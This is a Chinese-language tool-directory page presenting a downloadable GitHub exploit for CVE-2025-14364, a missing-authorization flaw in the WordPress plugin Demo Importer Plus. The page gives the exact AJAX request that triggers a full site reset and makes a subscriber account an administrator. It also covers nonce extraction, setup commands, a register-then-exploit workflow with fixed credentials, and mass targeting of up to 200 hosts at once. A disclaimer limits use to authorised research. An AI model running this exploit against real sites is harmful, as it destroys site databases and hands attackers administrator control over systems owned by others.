Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-14364 — Demo Importer Plus <= 2.0.8 - 授权缺失导致已认证(订阅者及以上)站点重置和权限提升 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-14364
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-14364

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - 授权缺失导致已认证(订阅者及以上)站点重置和权限提升

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-14364

Demo Importer Plus ≤ 2.0.8 — 缺少授权导致已认证(订阅者+)站点重置和权限提升

CVE-2025-14364 — Demo Importer Plus · 全站重置 → 权限提升

root@kitploit:~
  _      _   _   _  _   _            _   _
 / \  / |_ __ ) / \  ) |_ __ /| |_|_ _) |_ |_|_
 \_ \/  |_   /_ \_/ /_  _)    |   |  _) |_)  |

已认证的订阅者 → 管理员,通过 do-reinstall AJAX 动作


CVE CVSS Plugin Auth Python Platform Author


〔 1 〕 漏洞

根本原因:
Ajax::handle_request() 注册了 demo_importer_plus AJAX 动作,但未调用 current_user_can()。任何已认证的订阅者可以发送 {"demo_action":"do-reinstall"} 来触发 wp_install(),该函数会删除所有数据库表(除 users / usermeta 外)并重新运行 WordPress 安装程序——在此过程中自动将攻击账户分配为 管理员角色。


〔 2 〕 攻击流程

root@kitploit:~
模式 1 — 诊断
  探测:DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
  → 识别活跃 WordPress 目标

模式 2 — 注册
  POST /wp-login.php?action=register
  → 创建订阅者账户
  → 激活邮件发送至收件箱
     ↳ 你必须在运行模式 3 之前点击邮件链接

模式 3 — 利用
  POST /wp-login.php                         → 以订阅者身份认证
  GET  /wp-admin/                            → 提取 wp-rest-nonce
  POST /wp-admin/admin-ajax.php
       action=demo_importer_plus
       {"demo_action":"do-reinstall"}        → 触发全站重置
  ← 响应:"站点已成功重置"
  → 攻击账户现在持有管理员角色

〔 3 〕 环境配置

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py

requirements.txt

root@kitploit:~
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0

〔 4 〕 使用方法

root@kitploit:~
模式 [1/2/3]:           1 = 诊断   2 = 注册   3 = 利用
目标文件:           list.txt  (每行一个主机)
并发数:                默认 30,最大 200
超时时间:               默认 10秒

目标格式 — list.txt:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

► 模式 1 · 诊断

探测每个主机的四个端点,并写入干净的结果。

root@kitploit:~
Mode: 1

输出 → diagnostics_results.txt · passed_targets.txt


► 模式 2 · 注册

root@kitploit:~
Mode: 2
Email:    [email protected]
Username: Nxploited
Password: NxploitedSA

检查你的收件箱,并在运行模式 3 之前点击激活链接。

输出 → register_results.txt


► 模式 3 · 利用

root@kitploit:~
Mode: 3
Username: Nxploited
Password: NxploitedSA

成功时工具输出:

root@kitploit:~
[HH:MM:SS] SUCCESS  "success":true,"message":"Site has been reset successfully" -> https://target.com

并写入 exploit_results.txt:

root@kitploit:~
https://target.com/wp-login.php  site:...  user:Nxploited  pass:NxploitedSA  type:admin

〔 5 〕 输出文件


〔 6 〕 技术细节

易受攻击的请求:

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <extracted_nonce>

{"demo_action":"do-reinstall"}

成功响应:

root@kitploit:~
{"success": true, "data": {"message": "Site has been reset successfully"}}

Nonce 提取 — 两个备用来源:

root@kitploit:~
wpApiSettings.nonce              (来自 /wp-admin/ 页面源代码)
elementorOneSettingsData.wpRestNonce   (备用)

〔 7 〕 作者与联系方式

root@kitploit:~
By   : Nxploited (Khaled Alenazi)
GitHub   : https://github.com/Nxploited
Telegram : @KNxploited

GitHub Telegram


〔 8 〕 免责声明

root@kitploit:~
本软件严格用于安全研究和教育目的。

作者对该工具被用于操作者未拥有或未获得明确书面授权测试的系统
所产生的任何行为不承担任何责任。

未经授权对第三方系统使用本软件违反大多数司法管辖区的计算机犯罪法律
(CFAA、CMA 及全球等效法律),并可能导致刑事起诉。

你独自负责确保在运行本工具对抗任何目标之前拥有合法权限。

© 2025 Nxploited · 仅用于安全研究 · Demo Importer Plus ≤ 2.0.8 · 已在 2.0.9 中修复
下载工具
CVECVE-2025-14364
CVSS v3.18.8 高 — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
插件Demo Importer Plus
受影响版本所有版本 ≤ 2.0.8
所需认证订阅者(最低注册角色)
类型缺少权限检查 → 全站重置 → 权限提升
CWECWE-862 · 缺少授权
文件内容
diagnostics_results.txt每个目标的完整探测 JSON
passed_targets.txt干净的目标(未检测到错误)
register_results.txt注册尝试记录
exploit_results.txt登录 · nonce · 重置结果 · 确认管理员命中
reset_results.txt每个目标的原始 do-reinstall 响应